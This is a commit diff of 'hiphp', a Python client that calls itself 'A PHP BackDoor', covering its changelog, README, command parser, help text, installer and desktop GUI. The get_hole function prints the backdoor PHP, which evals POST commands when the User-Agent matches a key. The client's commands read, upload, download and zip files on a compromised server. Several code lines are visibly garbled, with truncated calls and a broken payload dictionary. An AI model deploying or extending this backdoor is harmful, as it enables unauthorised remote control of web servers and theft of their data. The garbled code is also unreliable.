Projects STRLCPY hiphp Commits 4e7cc435
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■
    1  -## 0.2.23 [22-08-2022][Last Version]
     1 +## 0.2.24 [01-09-2022][Last Version]
     2 + - Fix "hiphp --ftp"
     3 + - Add "--cd" command for Change directory.
     4 + - Update all commands from "--command" to "command" (You can use both).
     5 + - Update & fix bugs in "hiphp --dst".
     6 + - Update help menu.
     7 + - Bug fixes & performance improvements.
     8 +
     9 +## 0.2.23 [22-08-2022]
    2 10   - Fix the entry with uppercase and lowercase letters.
    3 11   - Add "--down" command for Download files & folders.
    4 12   - Add "--zip" command for Compress files & folders.
    5 13   - Update "--help" to "--help [ACTION]".
    6 14   - Update the help list and enable it to display help when something goes wrong.
     15 + - Bug fixes & performance improvements.
    7 16  
    8 17  ## 0.2.22 [20-08-2022]
    9 18   - Update some info on pypi.
    skipped 108 lines
  • ■ ■ ■ ■ ■ ■
    skipped 31 lines
    32 32  * php
    33 33   
    34 34  <h2>Requirements:</h2>
    35  -[✓] <a href="">ashar</a><br>
     35 +<!--[✓] <a href="">ashar</a><br-->
    36 36  [✓] <a href="">requests</a><br>
    37 37  [✓] <a href="">hexor</a><br>
    38 38  [✓] <a href="">biglibrary</a>
    skipped 79 lines
    118 118  >>> python3 <KEY> <URL>
    119 119  ```
    120 120   
     121 +<h2>Run with tools:</h2>
     122 +```
     123 +# run with hiphp_desktop tool:
     124 +>>> git clone
     125 +>>> cd hiphp
     126 +>>> cp -r "hiphp" "tools/hiphp_desktop/"
     127 +>>> cd tools/hiphp_desktop/
     128 +>>> pip install -r requirements.txt
     129 +>>> python3
     130 + 
     131 +# run with hiphp_ftp tool:
     132 +>>> git clone
     133 +>>> cd hiphp
     134 +>>> cp -r "hiphp" "tools/hiphp_ftp/"
     135 +>>> cd tools/hiphp_ftp/
     136 +>>> pip install -r requirements.txt
     137 +>>> python3 <KEY> <URL>
     138 +```
     139 + 
    121 140  <h2>Script Usage:</h2>
    122 141   
    123 142  ```python
    skipped 52 lines
    176 195  ```
    177 196  hiphp Commands :
    178 197  ════════════════
    179  - Command Description
    180  - ------- -----------
    181  -[OPTIONS]
    182  - ┌───────────┘
    183  - > --help ─> # Display this help.
    184  - > --help [ACTIONS] ─> # Help for a specific command.
    185  - > --geth ─> # Get the hole Code, "HIPHP_HOLE_CODE" It has the same purpose.
    186  - > --phpinfo ─> # Some information about the server.
    187  - > --cls ─> # Clear console.
    188  - > --exit ─> # Exit this console.
    189  -┌─┘
    190  -[ACTIONS]
    191  - ┌───────────┘
    192  - > --ls ─> # List information about the FILEs (the current directory by default).
    193  - > Usage: --ls [OPTION] [PATH]
    194  - > Mandatory arguments to long options:
    195  - > --ls ─> # Get a list of all files and folders from the current directory.
    196  - > --ls [PATH] ─> # Get a list of all files and folders from a specified directory.
    197  - > --ls -all ─> # Get a list of all files, folders and subfolders from the current directory.
    198  - > --ls -all [PATH] ─> # Get a list of all files, folders and subfolders from a specified directory.
    199  - ├─────────────────────────── ─ ─ ─
    200  - > --cat ─> # Concatenate FILE to standard output.
    201  - > Usage: --cat [FILE_PATH]
    202  - ├─────────────────────────── ─ ─ ─
    203  - > --set ─> # Create a code that is always saved on during work.
    204  - > Usage: --set [PHP_CODE]
    205  - > You can return the initial value with "--dset".
    206  - ├─────────────────────────── ─ ─ ─
    207  - ├─> --rf ─> # Run code from file.
    208  - ├─> Usage: --rf [FILE_PATH] [VARIABLES]
    209  - ├┬> Mandatory arguments to long options:
    210  - > --rf [FILE_PATH] ─> # Run code from file.
    211  - │└─> --rf [FILE_PATH] [VARIABLES] ─> # Run code from file with variables, EX: --rf example.php var==1 var2==hello
    212  - ├─────────────────────────── ─ ─ ─
    213  - ├─> --up ─> # Upload a file.
    214  - ├─> Usage: --up [FILE_PATH] [PATH]
    215  - ├┬> Mandatory arguments to long options:
    216  - │├─> --up [FILE_PATH] ─> # Upload a file to the current directory.
    217  - │└─> --up [FILE_PATH] [PATH] ─> # Upload a file to a specified directory.
    218  - ├─────────────────────────── ─ ─ ─
    219  - ├─> --down ─> # download a file.
    220  - ├─> Usage: --down [-f/-d] [FILE/DIR_PATH] [OUT_PATH]
    221  - ├┬> Mandatory arguments to long options:
    222  - │├─> --down -f [FILE_PATH] ─> # Download a file to the current directory.
    223  - │├─> --down -f [FILE_PATH] [OUT_PATH] ─> # Download file to a specified directory.
    224  - │├─> --down -d [DIR_PATH] ─> # Download a folder to the current directory.
    225  - > --down -d [DIR_PATH] [OUT_PATH] ─> # Download folder to a specified directory.
    226  - │├─> --down -all ─> # Download all files to the current directory.
    227  - > --down -all [OUT_PATH] ─> # Download all files to a specified directory.
    228  - ├─────────────────────────── ─ ─ ─
    229  - ├─> --zip ─> # Compress a directory.
    230  - ├─> Usage: --zip [DIR_PATH]
    231  - ├┬> Mandatory arguments to long options:
    232  - > --zip ─> # Compress the current directory.
    233  - │└─> --zip [DIR_PATH] ─> # Compress a specific directory.
    234  - ├─────────────────────────── ─ ─ ─
    235  -┌─┘
    236  -└[ABOUT]─────┐
    237  - ┌──────────┘
    238  - ├─> --update ─> # check for updates.
    239  - ├─> --license ─> # This project license.
    240  - ├─> --about ─> # About this project.
    241  - .
    242  - .
    243  - .
     198 + Command Description
     199 + ------- -----------
     200 +[OPTIONS]
     201 + 
     202 + --help, help ─> # Display this help.
     203 + --help [ACTIONS], help [ACTIONS] ─> # Help for a specific command.
     204 + --geth, geth ─> # Get the hole Code, "HIPHP_HOLE_CODE" It has the same purpose.
     205 + --phpinfo, phpinfo ─> # Some information about the server.
     206 + --cls, cls ─> # Clear console.
     207 + --exit, exit ─> # Exit this console.
     208 + 
     209 +[ACTIONS]
     210 + 
     211 + --ls, ls ─> # List information about the FILEs (the current directory by default).
     212 + Usage: --ls [OPTION] [PATH], ls [OPTION] [PATH]
     213 + Mandatory arguments to long options:
     214 + --ls ─> # Get a list of all files and folders from the current directory.
     215 + --ls [PATH] ─> # Get a list of all files and folders from a specified directory.
     216 + --ls -all ─> # Get a list of all files, folders and subfolders from the current directory.
     217 + --ls -all [PATH] ─> # Get a list of all files, folders and subfolders from a specified directory.
     218 + 
     219 + --cat, cat ─> # Concatenate FILE to standard output.
     220 + Usage: --cat [FILE_PATH]
     221 + 
     222 + --set, set ─> # Create a code that is always saved on during work.
     223 + Usage: --set [PHP_CODE]
     224 + You can return the initial value with "--dset" or "dset".
     225 + 
     226 + --cd, cd ─> # Change directory.
     227 + Usage: --cd [PATH]
     228 + 
     229 + --rf, rf ─> # Run code from file.
     230 + Usage: --rf [FILE_PATH] [VARIABLES]
     231 + Mandatory arguments to long options:
     232 + --rf [FILE_PATH] ─> # Run code from file.
     233 + --rf [FILE_PATH] [VARIABLES] ─> # Run code from file with variables, EX: --rf example.php var==hello
     234 +
     235 + --up, up ─> # Upload a file.
     236 + Usage: --up [FILE_PATH] [PATH]
     237 + Mandatory arguments to long options:
     238 + --up [FILE_PATH] ─> # Upload a file to the current directory.
     239 + --up [FILE_PATH] [PATH] ─> # Upload a file to a specified directory.
     240 + 
     241 + --down, down ─> # download a file.
     242 + Usage: --down [-f/-d] [FILE/DIR_PATH] [OUT_PATH]
     243 + Mandatory arguments to long options:
     244 + --down -f [FILE_PATH] ─> # Download a file to the current directory.
     245 + --down -f [FILE_PATH] [OUT_PATH] ─> # Download file to a specified directory.
     246 + --down -d [DIR_PATH] ─> # Download a folder to the current directory.
     247 + --down -d [DIR_PATH] [OUT_PATH] ─> # Download folder to a specified directory.
     248 + --down -all ─> # Download all files to the current directory.
     249 + --down -all [OUT_PATH] ─> # Download all files to a specified directory.
     250 + 
     251 + --zip, zip ─> # Compress a directory.
     252 + Usage: --zip [DIR_PATH]
     253 + Mandatory arguments to long options:
     254 + --zip ─> # Compress the current directory.
     255 + --zip [DIR_PATH] ─> # Compress a specific directory.
     256 + 
     257 +[ABOUT]
     258 + 
     259 + --update, update ─> # check for updates.
     260 + --license, license ─> # This project license.
     261 + --about, about ─> # About this project.
    244 262  ```
    245 263   
    246  -<h2>HIPHP_HOLE_CODE:</h2>
     264 +<h2>HIPHP_HOLE_CODE Example:</h2>
    247 265  <div align="center">
    248 266   <img src="" alt="hiphp by yasserbdj96">
    249 267  </div>
    skipped 17 lines
    267 285   <a href="">
    268 286   <img height="100" src="" alt="hiphp by yasserbdj96">
    269 287   </a>
    270  - <a href="">
    271  - <img height="100" src="" alt="hiphp by yasserbdj96">
     288 + <a href="">
     289 + <img height="100" src="" alt="hiphp by yasserbdj96">
    272 290   </a>
    273  - <a href="">
    274  - <img height="100" src="" alt="hiphp by yasserbdj96">
     291 + <a href="">
     292 + <img height="100" src="" alt="hiphp by yasserbdj96">
     293 + </a>
     294 + <a href="">
     295 + <img height="100" src="" alt="hiphp by yasserbdj96">
    275 296   </a>
    276  - <a href="">
    277  - <img height="100" src="" alt="hiphp by yasserbdj96">
     297 + <a href="">
     298 + <img height="100" src="" alt="hiphp by yasserbdj96">
    278 299   </a>
    279 300  </div>
    280 301   
    281 302  <h2>Changelog History:</h2>
    282 303   
    283 304  ```
    284  -## 0.2.23 [22-08-2022][Last Version]
     305 +## 0.2.24 [01-09-2022][Last Version]
     306 + - Fix "hiphp --ftp"
     307 + - Add "--cd" command for Change directory.
     308 + - Update all commands from "--command" to "command" (You can use both).
     309 + - Update & fix bugs in "hiphp --dst".
     310 + - Update help menu.
     311 + - Bug fixes & performance improvements.
     312 + 
     313 +## 0.2.23 [22-08-2022]
    285 314   - Fix the entry with uppercase and lowercase letters.
    286 315   - Add "--down" command for Download files & folders.
    287 316   - Add "--zip" command for Compress files & folders.
    288 317   - Update "--help" to "--help [ACTION]".
    289 318   - Update the help list and enable it to display help when something goes wrong.
     319 + - Bug fixes & performance improvements.
    290 320   
    291 321  ## 0.2.22 [20-08-2022]
    292 322   - Update some info on pypi.
    skipped 122 lines
    415 445  <br>
    416 446  <div align="center">
    417 447   <a href="">
    418  - <img src="" alt="ko-fi">
     448 + <img src="" alt="hiphp by yasserbdj96">
    419 449   </a>
    420 450   <br>
    421 451   BTC: bc1q2dks8w8uurca5xmfwv4jwl7upehyjjakr3xga9
    skipped 4 lines
  • ■ ■ ■ ■ ■ ■
    skipped 59 lines
    60 60   self.c_green="#34a853"#green
    61 61   #
    62 62   self.set=""
     63 +""
    63 64   self.do_x=0
    64 65  
    65 66   #cli:
    66 67   def cli(self):
    67  - #
     68 + #logo
    68 69   logox=""
    69 70   if self.do_x==0:
    70 71   logox=logo(__version__)
    71 72   self.do_x+=1
    72  - #
     73 +
     74 + #getcwd
    73 75   getcwd=""
    74 76,self.key,self.url,self.headers,True,"echo getcwd();")
    75 77   if emsg_1 in reee:
    skipped 17 lines
    93 95   # exit()
    94 96   if command and command!="":
    95 97   #help
    96  - if command[0:6].lower()=="--help":
     98 + if command[0:6].lower()=="--help" or command[0:4].lower()=="help":
    97 99   help_c=command.split(" ")
    98 100   try:
    99 101   help(help_c[1])
    100 102   except:
    101 103   print(help())
    102 104   #exit
    103  - elif command[0:6].lower()=="--exit":
     105 + elif command[0:6].lower()=="--exit" or command[0:4].lower()=="exit":
    104 106   exit()
    105 107   #license
    106  - elif command[0:9].lower()=="--license":
     108 + elif command[0:9].lower()=="--license" or command[0:7].lower()=="license":
    107 109   print(license())
    108 110   #about
    109  - elif command[0:7].lower()=="--about":
     111 + elif command[0:7].lower()=="--about" or command[0:5].lower()=="about":
    110 112   print(about())
    111 113   #download
    112  - elif command[0:6].lower()=="--down":
     114 + elif command[0:6].lower()=="--down" or command[0:4].lower()=="down":
    113 115   down=command.split(" ")
    114 116   try:
    115 117   if down[1].lower()=="-f":
    skipped 35 lines
    151 153   except:
    152 154   help("--down")
    153 155   #zip
    154  - elif command[0:5].lower()=="--zip":
     156 + elif command[0:5].lower()=="--zip" or command[0:3].lower()=="zip":
    155 157   ziping=command.split(" ")
    156 158   try:
    157 159   zip_file_name=hiphp.compress(self,ziping[1])
    skipped 2 lines
    160 162   print(smsg_2+reee+"/"+zip_file_name)
    161 163  
    162 164   #update
    163  - elif command[0:8].lower()=="--update":
    164  - r = ""
     165 + elif command[0:8].lower()=="--update" or command[0:6].lower()=="update":
     166 + r=""
    165 167   version = requests.get(r).text
    166 168   version=version.replace('\n', ' ').replace('\r', '').replace(' ', '')
    167 169   if version==__version__:
    skipped 13 lines
    181 183   else:
    182 184   print(msg_4)
    183 185   #ls
    184  - elif command[0:4].lower()=="--ls":
    185  - if len(command)==4:
     186 + elif command[0:4].lower()=="--ls" or command[0:2].lower()=="ls":
     187 + if len(command)==4 or len(command)==2:
    186 188   command=scandir()
    187  - elif command[5:9].lower()=="-all":
     189 + elif command[0:4].lower()=="--ls" and command[5:9].lower()=="-all":
    188 190   dirx=command[10:]
    189  - if dirx=="":dirx="./"
     191 + if dirx=="":
     192 + dirx="./"
     193 + command=scandir_all(dirx)
     194 + elif command[0:2].lower()=="ls" and command[3:7].lower()=="-all":
     195 + dirx=command[8:]
     196 + if dirx=="":
     197 + dirx="./"
    190 198   command=scandir_all(dirx)
    191 199   else:
    192  - dirx=command[5:]
     200 + if len(command)==4:
     201 + dirx=command[5:]
     202 + else:
     203 + dirx=command[3:]
     204 +
     205 + if dirx[-1]!="/":
     206 + dirx+="/"
    193 207   command=scandir(dirx)
    194 208,self.key,self.url,self.headers,True,command)
    195 209   x=ast.literal_eval(sd)
    skipped 1 lines
    197 211   for i in range(len(x)):
    198 212   if x[i]!="." and x[i]!="..":
    199 213   x[i]=x[i].replace("\/","/")
    200  -
    201 214   biglibrary().lslist(x,separator=" | ")
    202 215   #set
    203  - elif command[0:5].lower()=="--set":
    204  - self.set+=command[6:]
     216 + elif command[0:4].lower()=="--cd" or command[0:2].lower()=="cd":
     217 +""
     218 + if command[0:4].lower()=="--cd":
     219 +"chdir('{reee}/{command[5:]}');"
     220 + else:
     221 +"chdir('{reee}/{command[3:]}');"
     222 + #set
     223 + elif command[0:5].lower()=="--set" or command[0:3].lower()=="set":
     224 + if command[0:5].lower()=="--set":
     225 + self.set+=command[6:]
     226 + else:
     227 + self.set+=command[4:]
    205 228   #delete set
    206  - elif command[0:6].lower()=="--dset":
     229 + elif command[0:6].lower()=="--dset" or command[0:4].lower()=="dset":
    207 230   self.set=""
    208 231   #clear
    209  - elif command[0:5].lower()=="--cls":
     232 + elif command[0:5].lower()=="--cls" or command[0:3].lower()=="cls":
    210 233   os.system('cls' if == 'nt' else 'clear')
    211 234   #Get the hole Code
    212  - elif command[0:6].lower()=="--geth" or command[0:15].upper()=="HIPHP_HOLE_CODE":
     235 + elif command[0:6].lower()=="--geth" or command[0:15].upper()=="HIPHP_HOLE_CODE" or command[0:4].lower()=="geth":
    213 236   hiphp.get_hole(self,get=True)
    214 237   #cat
    215  - elif command[0:5].lower()=="--cat":
    216  - dirx=command[6:]
     238 + elif command[0:5].lower()=="--cat" or command[0:3].lower()=="cat":
     239 + if command[0:5].lower()=="--cat":
     240 + dirx=command[6:]
     241 + else:
     242 + dirx=command[4:]
    217 243   command=file_get_contents(dirx)
    218 244,self.key,self.url,self.headers,False,command)
    219 245   #php_info:
    220  - elif command[0:9].lower()=="--phpinfo":
     246 + elif command[0:9].lower()=="--phpinfo" or command[0:7].lower()=="phpinfo":
    221 247   command=php_info()
    222 248,self.key,self.url,self.headers,False,command)
    223 249   #rf
    224  - elif command[0:4].lower()=="--rf":
     250 + elif command[0:4].lower()=="--rf" or command[0:2].lower()=="rf":
    225 251   varss=command.split(" ")
    226 252  
    227 253   if varss[len(varss)-1]=="":
    228 254   del varss[len(varss)-1]
    229 255   print(hiphp.run_file(self,varss[1],varss[2:]))
    230 256   #up
    231  - elif command[0:4].lower()=="--up":
    232  - v=command[5:].split(" ")
    233  - if len(v)>1:
     257 + elif command[0:4].lower()=="--up" or command[0:2].lower()=="up":
     258 + v=command.split(" ")
     259 + #print(v)
     260 + if len(v)>2:
    234 261   #try:
    235  - file_path=v[0]
    236  - to=v[1]
     262 + file_path=v[1]
     263 + to=v[2]
    237 264   if to[len(to)-1:len(to)]!="/":
    238 265   to=to+"/"
    239 266   hiphp.upload(self,file_path,to)
    240 267   #except:
    241 268   else:
    242  - hiphp.upload(self,command[5:].split(" ")[0])
     269 + hiphp.upload(self,command.split(" ")[1])
    243 270   else:
    244 271,self.key,self.url,self.headers,False,command)
    245 272   else:
    skipped 16 lines
    262 289   key_len=len(key)+1
    263 290   # if the key are true:
    264 291   if response.text[0:key_len]=="#"+key:
    265  - ploads={'command':self.set+command}
     292 + ploads={'command'}
    266 293   if ".onion" in url:
    267 294,headers=header,data=ploads,proxies=proxies)
    268 295   else:
    skipped 92 lines
    361 388   print(down_path)
    362 389   return down_path
    363 390  
    364  -
    365 391   #get the hole:
    366 392   def get_hole(self,get=False):
    367 393   code="if($_SERVER['HTTP_USER_AGENT']=='"+self.key+"'){echo'#"+self.key+"';if(isset($_POST['command'])){eval($_POST['command']);}exit;}"
    skipped 11 lines
    379 405   geth+=self.color.c(php_e,self.c_red)
    380 406   print(geth)
    381 407  #}END.
    382  - 
  • ■ ■ ■ ■ ■ ■
    skipped 13 lines
    14 14  #START{
    15 15  def help(opt=""):
    16 16   #
    17  - spsbar="""\n ├─────────────────────────── ─ ─ ─"""
     17 + spsbar=""""""
    18 18   
    19 19   #
    20 20   header="""hiphp Commands :
    21 21  ════════════════
    22  - Command Description
    23  - ------- -----------"""
     22 + Command Description
     23 + ------- -----------"""
    24 24   
    25 25   #
    26 26   OPTIONS="""
    27  -[OPTIONS]
    28  - ┌───────────┘
    29  - > --help ─> # Display this help.
    30  - > --help [ACTIONS] ─> # Help for a specific command.
    31  - > --geth ─> # Get the hole Code, "HIPHP_HOLE_CODE" It has the same purpose.
    32  - > --phpinfo ─> # Some information about the server.
    33  - > --cls ─> # Clear console.
    34  - > --exit ─> # Exit this console.
    35  -"""
     27 +[OPTIONS]
     28 + 
     29 + --help, help ─> # Display this help.
     30 + --help [ACTIONS], help [ACTIONS] ─> # Help for a specific command.
     31 + --geth, geth ─> # Get the hole Code, "HIPHP_HOLE_CODE" It has the same purpose.
     32 + --phpinfo, phpinfo ─> # Some information about the server.
     33 + --cls, cls ─> # Clear console.
     34 + --exit, exit ─> # Exit this console.
     35 +"""
    36 36   
    37 37   #
    38 38   ACTIONS="""
    39  -[ACTIONS]
    40  - ┌───────────┘"""
     39 +[ACTIONS]
     40 +"""
    41 41   
    42 42   #
    43 43   ls_c="""
    44  - > --ls ─> # List information about the FILEs (the current directory by default).
    45  - > Usage: --ls [OPTION] [PATH]
    46  - > Mandatory arguments to long options:
    47  - > --ls ─> # Get a list of all files and folders from the current directory.
    48  - > --ls [PATH] ─> # Get a list of all files and folders from a specified directory.
    49  - > --ls -all ─> # Get a list of all files, folders and subfolders from the current directory.
    50  - > --ls -all [PATH] ─> # Get a list of all files, folders and subfolders from a specified directory."""
     44 + --ls, ls ─> # List information about the FILEs (the current directory by default).
     45 + Usage: --ls [OPTION] [PATH], ls [OPTION] [PATH]
     46 + Mandatory arguments to long options:
     47 + --ls ─> # Get a list of all files and folders from the current directory.
     48 + --ls [PATH] ─> # Get a list of all files and folders from a specified directory.
     49 + --ls -all ─> # Get a list of all files, folders and subfolders from the current directory.
     50 + --ls -all [PATH] ─> # Get a list of all files, folders and subfolders from a specified directory.
     51 +"""
    51 52   
    52 53   #
    53 54   cat_c="""
    54  - > --cat ─> # Concatenate FILE to standard output.
    55  - > Usage: --cat [FILE_PATH]"""
     55 + --cat, cat ─> # Concatenate FILE to standard output.
     56 + Usage: --cat [FILE_PATH]
     57 +"""
    56 58   
    57 59   #
    58 60   set_c="""
    59  - > --set ─> # Create a code that is always saved on during work.
    60  - > Usage: --set [PHP_CODE]
    61  - > You can return the initial value with "--dset"."""
     61 + --set, set ─> # Create a code that is always saved on during work.
     62 + Usage: --set [PHP_CODE]
     63 + You can return the initial value with "--dset" or "dset".
     64 +"""
     65 + 
     66 + #
     67 + cd_c="""
     68 + --cd, cd ─> # Change directory.
     69 + Usage: --cd [PATH]
     70 +"""
    62 71   
    63 72   #
    64 73   rf_c="""
    65  - > --rf ─> # Run code from file.
    66  - > Usage: --rf [FILE_PATH] [VARIABLES]
    67  - > Mandatory arguments to long options:
    68  - > --rf [FILE_PATH] ─> # Run code from file.
    69  - > --rf [FILE_PATH] [VARIABLES] ─> # Run code from file with variables, EX: --rf example.php var==1 var2==hello"""
     74 + --rf, rf ─> # Run code from file.
     75 + Usage: --rf [FILE_PATH] [VARIABLES]
     76 + Mandatory arguments to long options:
     77 + --rf [FILE_PATH] ─> # Run code from file.
     78 + --rf [FILE_PATH] [VARIABLES] ─> # Run code from file with variables, EX: --rf example.php var==hello
     79 + """
    70 80   
    71 81   #
    72 82   up_c="""
    73  - > --up ─> # Upload a file.
    74  - > Usage: --up [FILE_PATH] [PATH]
    75  - > Mandatory arguments to long options:
    76  - > --up [FILE_PATH] ─> # Upload a file to the current directory.
    77  - > --up [FILE_PATH] [PATH] ─> # Upload a file to a specified directory."""
     83 + --up, up ─> # Upload a file.
     84 + Usage: --up [FILE_PATH] [PATH]
     85 + Mandatory arguments to long options:
     86 + --up [FILE_PATH] ─> # Upload a file to the current directory.
     87 + --up [FILE_PATH] [PATH] ─> # Upload a file to a specified directory.
     88 +"""
    78 89   
    79 90   #
    80 91   down_c="""
    81  - > --down ─> # download a file.
    82  - > Usage: --down [-f/-d] [FILE/DIR_PATH] [OUT_PATH]
    83  - > Mandatory arguments to long options:
    84  - > --down -f [FILE_PATH] ─> # Download a file to the current directory.
    85  - > --down -f [FILE_PATH] [OUT_PATH] ─> # Download file to a specified directory.
    86  - > --down -d [DIR_PATH] ─> # Download a folder to the current directory.
    87  - > --down -d [DIR_PATH] [OUT_PATH] ─> # Download folder to a specified directory.
    88  - > --down -all ─> # Download all files to the current directory.
    89  - > --down -all [OUT_PATH] ─> # Download all files to a specified directory."""
     92 + --down, down ─> # download a file.
     93 + Usage: --down [-f/-d] [FILE/DIR_PATH] [OUT_PATH]
     94 + Mandatory arguments to long options:
     95 + --down -f [FILE_PATH] ─> # Download a file to the current directory.
     96 + --down -f [FILE_PATH] [OUT_PATH] ─> # Download file to a specified directory.
     97 + --down -d [DIR_PATH] ─> # Download a folder to the current directory.
     98 + --down -d [DIR_PATH] [OUT_PATH] ─> # Download folder to a specified directory.
     99 + --down -all ─> # Download all files to the current directory.
     100 + --down -all [OUT_PATH] ─> # Download all files to a specified directory.
     101 +"""
    90 102   
    91 103   #
    92 104   zip_c="""
    93  - > --zip ─> # Compress a directory.
    94  - > Usage: --zip [DIR_PATH]
    95  - > Mandatory arguments to long options:
    96  - > --zip ─> # Compress the current directory.
    97  - > --zip [DIR_PATH] ─> # Compress a specific directory."""
     105 + --zip, zip ─> # Compress a directory.
     106 + Usage: --zip [DIR_PATH]
     107 + Mandatory arguments to long options:
     108 + --zip ─> # Compress the current directory.
     109 + --zip [DIR_PATH] ─> # Compress a specific directory.
     110 +"""
    98 111   #
    99 112   ABOUT="""
    100  -┌─┘
    101  -└[ABOUT]─────┐
    102  - ┌──────────┘
    103  - ├─> --update ─> # check for updates.
    104  - ├─> --license ─> # This project license.
    105  - ├─> --about ─> # About this project.
    106  - .
    107  - .
    108  - ."""
     113 +[ABOUT]
     114 + 
     115 + --update, update ─> # check for updates.
     116 + --license, license ─> # This project license.
     117 + --about, about ─> # About this project."""
    109 118   if opt=="":
    110  - return header+OPTIONS+ACTIONS+ls_c+spsbar+cat_c+spsbar+set_c+spsbar+rf_c+spsbar+up_c+spsbar+down_c+spsbar+zip_c+spsbar+ABOUT
     119 + return header+OPTIONS+ACTIONS+ls_c+spsbar+cat_c+spsbar+set_c+spsbar+cd_c+spsbar+rf_c+spsbar+up_c+spsbar+down_c+spsbar+zip_c+spsbar+ABOUT
    111 120   else:
    112 121   opt=opt.replace("--","")
    113 122   opt=opt+"_c"
    skipped 3 lines
  • ■ ■ ■ ■ ■ ■
    skipped 24 lines
    25 25   color=hexor(True,"hex")
    26 26   
    27 27   spas=" "*5
    28  - code_by=color.c("Code by -> ",c_yellow)+color.c("yasserbdj96",c_green)
     28 + code_by=color.c("A PHP BackDoor by ",c_yellow)+color.c("yasserbdj96",c_green)
    29 29   logo+=color.c(f"""
    30 30  {spas} ▄███████▄ ▄█ █▄ ▄███████▄
    31 31  {spas} ███ ███ ███ ███ ███ ███
    skipped 2 lines
    34 34  {spas}╠═══╣ ║ ███ ███ ███ ███
    35 35  {spas}║ ║ ║ ███ V{__version__} ███ ███ ███
    36 36  {spas}╩ ╩ ═╩═ ▄████▀ ███ █▀ ▄████▀ {code_by}\n""",c_red)
    37  - logo+=color.c(" "*17+"\n",c_blue)
     37 + logo+=color.c(" "*17+"\n",c_blue)
    38 38   #logo+=self.color.c(" "*37+"Code by -> ",self.c_yellow)+self.color.c("yasserbdj96\n",self.c_green)
    39 39   #logo+=self.color.c("\n - You are now connected safety. You can print the PHP commands below for comprehensive control of the site.\n",self.c_blue)
    40 40   logo+=color.c("\n - '--help' for more informations.\n",c_yellow)
    41  - logo+=color.c(" - '--exit' OR 'Ctrl+C' for exit :)\n\n",c_yellow)
     41 + logo+=color.c(" - '--exit' OR 'Ctrl+C' for exit.\n\n",c_yellow)
    42 42   return logo
    43 43  #
    44 44  try:
    skipped 7 lines
  • ■ ■ ■ ■
    skipped 11 lines
    12 12  # | |
    13 13   
    14 14  #START{
    15  -__version__="0.2.23"
     15 +__version__="0.2.24"
    16 16  #}END.
  • install/hiphp.png
  • ■ ■ ■ ■ ■ ■
    skipped 23 lines
    24 24   sudo cp "$" "/usr/local/bin/$appname";
    25 25   
    26 26   # install hiphp_ftp script:
    27  - sudo cp "../scripts/hiphp_ftp/" "/usr/share/$appname/";
    28  - sudo cp "../scripts/hiphp_ftp/favicon.png" "/usr/share/$appname/favicon.png";
    29  - pip install -r "../scripts/hiphp_ftp/requirements.txt";
     27 + sudo cp "../tools/hiphp_ftp/" "/usr/share/$appname/";
     28 + sudo cp "../tools/hiphp_ftp/favicon.png" "/usr/share/$appname/favicon.png";
     29 + pip install -r "../tools/hiphp_ftp/requirements.txt";
    30 30   
    31 31   # install hiphp_desktop script:
    32  - sudo cp "../scripts/hiphp_desktop/" "/usr/share/$appname/";
    33  - sudo cp -r "../scripts/hiphp_desktop/src/." "/usr/share/$appname/src";
    34  - pip install -r "../scripts/hiphp_desktop/requirements.txt";
     32 + sudo cp "../tools/hiphp_desktop/" "/usr/share/$appname/";
     33 + sudo cp -r "../tools/hiphp_desktop/src/." "/usr/share/$appname/src";
     34 + pip install -r "../tools/hiphp_desktop/requirements.txt";
    35 35  }
    36 36   
    37 37  uninstall() {
    skipped 26 lines
  • ■ ■ ■ ■ ■
    1  -ashar
     1 +#ashar
    2 2  requests
    3 3  #readline # this is just for linux.
    4 4  hexor
    5 5  asciitext
    6 6  biglibrary
     7 + 
  • screenshot/HIPHP_HOLE_CODE.png
  • screenshot/how_hiphp_works.png
  • screenshot/screenshot.png
  • screenshot/screenshot0.png
  • screenshot/screenshot2.png
  • screenshot/screenshot3.png
  • ■ ■ ■ ■ ■
    1 1   
    2  - 
  • ■ ■ ■ ■ ■ ■
    skipped 13 lines
    14 14  #START{
    15 15  import eel
    16 16  from hiphp import *
     17 +from hiphp.hiphpversion import __version__
    17 18  from src.php import *
    18 19  import os
    19 20   
     21 + 
     22 +hiphp_desktop_version="0.2.0"
    20 23   
    21 24  eel.init(f'{os.path.dirname(os.path.realpath(__file__))}/src')
    22 25  #eel.init('src')
    skipped 12 lines
    35 38   except:
    36 39   hole=p1.get_hole()
    37 40   return hole
     41 + 
     42 +#ls:
     43 +@eel.expose
     44 +def version():
     45 + return "Desktop V"+hiphp_desktop_version,"hiphp V"+__version__
    38 46   
    39 47  #ls:
    40 48  @eel.expose
    skipped 43 lines
  • ■ ■ ■ ■ ■
    1 1  eel
    2  - 
  • tools/hiphp_desktop/screenshot/screenshot.png
  • tools/hiphp_desktop/screenshot/screenshot1.png
  • tools/hiphp_desktop/screenshot/screenshot2.png
  • tools/hiphp_desktop/src/favicon.ico
  • tools/hiphp_desktop/src/hiphp_logo.png
  • ■ ■ ■ ■ ■ ■
    skipped 33 lines
    34 34   <textarea id="cat" class="cat"></textarea>
    35 35   </div>
    36 36   
    37  - <div id="login">
    38  - <img src="./hiphp_logo.png" style="width: 160px;"><br>
    39  - <input type="text" id="key" value="123" placeholder="Key" style="width:50%;"><br>
     37 + <div id="login" >
     38 + <img src="./hiphp_logo.png" style="width: 160px;" onload="version()"><br>
    40 39   <input type="text" id="url" value="http://localhost/index.php" style="width:50%;" placeholder="Url"><br>
     40 + <input type="text" id="key" value="123" placeholder="Key" style="width:50%;"><br>
    41 41   <input type="button" value="Login" onclick="connect()"><br>
     42 + <div class="version" id="version"></div>
    42 43   </div>
     44 +
    43 45   </body>
    44 46  </html>
    45 47   
  • ■ ■ ■ ■ ■
    skipped 106 lines
    107 107   return x
    108 108  '''
    109 109  #}END.
    110  - 
  • ■ ■ ■ ■ ■
    skipped 37 lines
    38 38   
    39 39   var permxx='<a class="pointer" onclick="permi('+"'"+pathxx+"',"+"'"+xx[1]+"'"+')">'+xx[1]+'</a>';
    40 40   var s=' ';//space
    41  - var edit='<a class="pointer" onclick="cat('+"'"+pathxx+"'"+')"></a>'+s;
     41 + var edit='<a class="pointer" onclick="cat('+"'"+pathxx+"'"+')"></a>'+s;
    42 42   var del='<a class="pointer" onclick="del('+"'"+pathxx+"'"+')">❌</a>'+s;
    43  - var ren='<a class="pointer" onclick="ren('+"'"+pathxx+"'"+')"></a>'+s;
     43 + var ren='<a class="pointer" onclick="ren('+"'"+pathxx+"'"+')"></a>'+s;
    44 44   var check='<input type="checkbox">';
